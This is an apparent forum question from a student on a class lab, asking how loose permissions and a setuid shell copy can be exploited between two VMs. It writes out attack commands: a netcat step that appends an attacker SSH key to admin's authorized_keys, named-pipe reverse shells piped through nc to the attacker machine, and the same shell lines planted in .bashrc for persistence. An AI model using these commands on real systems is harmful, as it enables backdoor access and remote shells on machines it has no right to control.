I have a couple of VMs as part of a class I'm taking, I'm just trying to understand how loose permissions (other than the obvious 777) can be taken advantage of.
The targetted account on VM1 is admin. He's a regular user with sudo access to most commands and files. On VM1 is a regular unprivileged user called intruder. Attacks are being launched from VM2
on VM2: (as root, assume its a machine owned by intruder) I tried:
cat > command
echo "ssh-rsa blablabla...== root@VM2.mynetwork.net" | cat > /home/admin/.ssh/authorized_keys
nc -l VM1.mynetwork.net 14567 < commands
On VM1: I couldn't figure out how to exploit a regular 755 directory, so I skipped that part and pretended something already happened, and a copy of /bin/sh is placed in tmp with permissions 4755. (by a script run by admin)
as intruder I set up a named pipe in /tmp called mypipe. As intruder I ran:
/tmp/sh 0</tmp/mypipe | nc VM2.mynetwork.net 14567 >/tmp/mypipe
Which gives me permission denied error. the shell itself seems pretty bad, but I don't understand how it could be used (except by intruder if he was logged in.
So if somehow intruder snuck in and somehow inserted into .bashrc or .bash_login:
mkfifo /tmp/mypipe
/bin/sh 0</tmp/mypipe | nc -l VM2.mynetwork.net 14567 >/tmp/mypipe
how could this be exploited???
Aucun commentaire:
Enregistrer un commentaire